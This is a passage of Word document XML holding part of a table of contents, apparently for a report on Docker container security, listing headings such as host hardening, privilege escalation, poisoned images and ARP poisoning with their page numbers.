              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3B93E1A0" w14:textId="219ABD45" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859256" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.4 DOCKER AND KERNEL SECURITY</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859256 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="33438F18" w14:textId="65016152" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859257" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.4.1</w:t>
            </w:r>
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Host Hardening</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859257 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="41D548A3" w14:textId="03967C91" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859258" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.4.2</w:t>
            </w:r>
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Network Isolation</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859258 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E50628B" w14:textId="6F87E135" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859259" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.5 DOCKER SECURITY THREATS</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859259 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5CE1335B" w14:textId="0023E9D7" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859260" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.5.1</w:t>
            </w:r>
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Container Privilege Escalations</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859260 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="467C0120" w14:textId="18455EBF" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859261" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.5.2</w:t>
            </w:r>
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Poisoned Images</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859261 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1E440504" w14:textId="4F2F28AA" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859262" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.5.3</w:t>
            </w:r>
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Denial of Service (Dos)</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859262 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32811C82" w14:textId="7E6C2563" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859263" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.5.4</w:t>
            </w:r>
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> ARP Poisoning</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859263 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1E2F6798" w14:textId="3DFA0E7A" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859264" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.5.5</w:t>
            </w:r>
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Man-In-The-Middle Attack</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859264 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1BA5E6D2" w14:textId="3E5DCC4E" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859265" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.5.6</w:t>
            </w:r>
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Secret compromises</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859265 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4694CD65" w14:textId="629A1D27" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859266"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_Toc86859266 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="559883FE" w14:textId="7595CC6F" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859267" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:bidi="x-none"/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>CHAPTER 3</w:t>
            </w:r>
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> - RELATED WORK</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859267 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="570C7B1E" w14:textId="7438A50D" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859268"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_Toc86859268 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="14DC118E" w14:textId="42AA71CD" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859269" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1 LITERATURE REVIEW</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859269 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
